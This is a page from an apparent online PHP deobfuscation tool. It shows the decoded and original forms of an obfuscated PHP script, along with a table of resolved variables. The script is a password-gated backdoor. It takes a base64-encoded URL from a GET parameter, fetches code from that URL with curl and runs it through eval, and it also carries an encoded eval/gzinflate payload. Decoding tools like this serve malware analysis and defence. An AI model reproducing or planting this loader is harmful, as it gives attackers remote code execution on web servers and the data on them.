Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $co = chr(155-36-15).chr(87+29).chr(63+46).chr(76+13+19).chr(66-33+82).chr(74-36+74..

Decoded Output download

<?php 
$co = chr(155-36-15).chr(87+29).chr(63+46).chr(76+13+19).chr(66-33+82).chr(74-36+74).chr(27+40+34).chr(105-8+2).chr(11+35+59).chr(99-3+1).chr(76+13+19).chr(105-8+2).chr(155-36-15).chr(99-3+1).chr(53+36+25).chr(66-33+82).chr(23+72).chr(28+53+19).chr(27+40+34).chr(105-8+2).chr(54+22+35).chr(28+53+19).chr(27+40+34); 
$na = chr(59+39).chr(99-3+1).chr(66-33+82).chr(27+40+34).chr(26+28).chr(17+35).chr(23+72).chr(28+53+19).chr(27+40+34).chr(105-8+2).chr(54+22+35).chr(28+53+19).chr(27+40+34); 
$ro = chr(4+97+16).chr(53+36+25).chr(76+13+19).chr(28+53+19).chr(27+40+34).chr(105-8+2).chr(54+22+35).chr(28+53+19).chr(27+40+34); 
$AmInE = "ZXZhbCUyOCUyNyUzRiUyNmd0JTNCJTI3Lmd6dW5jb21wcmVzcyUyOGd6aW5mbGF0ZSUyOGJhc2U2NF9kZWNvZGUlMjhzdHJyZXYlMjglMjRBbWluZURucyUyOSUyOSUyOSUyOSUyOSUzQg=="; 
 $PAT='i';$xNgur='l';$yl='6';$hn='_';$q='o';$DVe='e';$VujVi='f';$Njf='n';$WL='t';$hjmv='4';$cyx='c';$w='b';$qb='a';$Hn='z';$C='s';$iEg='g';$ZQFv='d';$strNX=$w.$qb.$C.$DVe.$yl.$hjmv.$hn.$ZQFv.$DVe.$cyx.$q.$ZQFv.$DVe;$c_init='cu'.'rl_'.'init';$c_setopt='cur'.'l_set'.'opt';$c_exec='cu'.'rl_exe'.'c';if(isset($_GET['u']) && isset($_GET['pw'])){if(strtoupper(md5($_GET['pw']))!='F97A09727D1D49F8B72DBC75D0B9700D'){exit();}$ch=$c_init($strNX($_GET['u']));$c_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=$c_exec($ch);eval('?>'.$r);die;} ?>

Did this file decode correctly?

Original Code

<?php
$co = chr(155-36-15).chr(87+29).chr(63+46).chr(76+13+19).chr(66-33+82).chr(74-36+74).chr(27+40+34).chr(105-8+2).chr(11+35+59).chr(99-3+1).chr(76+13+19).chr(105-8+2).chr(155-36-15).chr(99-3+1).chr(53+36+25).chr(66-33+82).chr(23+72).chr(28+53+19).chr(27+40+34).chr(105-8+2).chr(54+22+35).chr(28+53+19).chr(27+40+34);
$na = chr(59+39).chr(99-3+1).chr(66-33+82).chr(27+40+34).chr(26+28).chr(17+35).chr(23+72).chr(28+53+19).chr(27+40+34).chr(105-8+2).chr(54+22+35).chr(28+53+19).chr(27+40+34);
$ro = chr(4+97+16).chr(53+36+25).chr(76+13+19).chr(28+53+19).chr(27+40+34).chr(105-8+2).chr(54+22+35).chr(28+53+19).chr(27+40+34);
$AmInE = "ZX\132hbCU\x79OCU\x79\116\x79U\x7a\122\x69U\x79\116\x6dd0\112\124\116C\112\124I3\114\x6dd6dW5jb21\x77c\x6d\126\x7ac\x79U\x79OGd6aW5\x6dbG\1060\132SU\x79OG\112hc2U2\116\1069\x6b\132W\116v\132GUlMjh\x7ad\110\112\x79\132XYlMj\x67lMj\122\102bWl\x75\132U\122\x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ\x67\x3d\x3d";
 $PAT='i';$xNgur='l';$yl='6';$hn='_';$q='o';$DVe='e';$VujVi='f';$Njf='n';$WL='t';$hjmv='4';$cyx='c';$w='b';$qb='a';$Hn='z';$C='s';$iEg='g';$ZQFv='d';$strNX=$w.$qb.$C.$DVe.$yl.$hjmv.$hn.$ZQFv.$DVe.$cyx.$q.$ZQFv.$DVe;$c_init='cu'.'rl_'.'init';$c_setopt='cur'.'l_set'.'opt';$c_exec='cu'.'rl_exe'.'c';if(isset($_GET['u']) && isset($_GET['pw'])){if(strtoupper(md5($_GET['pw']))!='F97A09727D1D49F8B72DBC75D0B9700D'){exit();}$ch=$c_init($strNX($_GET['u']));$c_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=$c_exec($ch);eval('?>'.$r);die;} ?>

Function Calls

chr 45

Variables

$C s
$q o
$w b
$Hn z
$WL t
$co htmlspecialchars_decode
$hn _
$na base64_decode
$qb a
$ro urldecode
$yl 6
$DVe e
$Njf n
$PAT i
$cyx c
$iEg g
$ZQFv d
$hjmv 4
$AmInE ZXZhbCUyOCUyNyUzRiUyNmd0JTNCJTI3Lmd6dW5jb21wcmVzcyUyOGd6aW5m..
$VujVi f
$strNX base64_decode
$xNgur l
$c_exec curl_exec
$c_init curl_init
$c_setopt curl_setopt

Stats

MD5 4718fb10bcf767b9f68ee7a59ff808eb
Eval Count 0
Decode Time 168 ms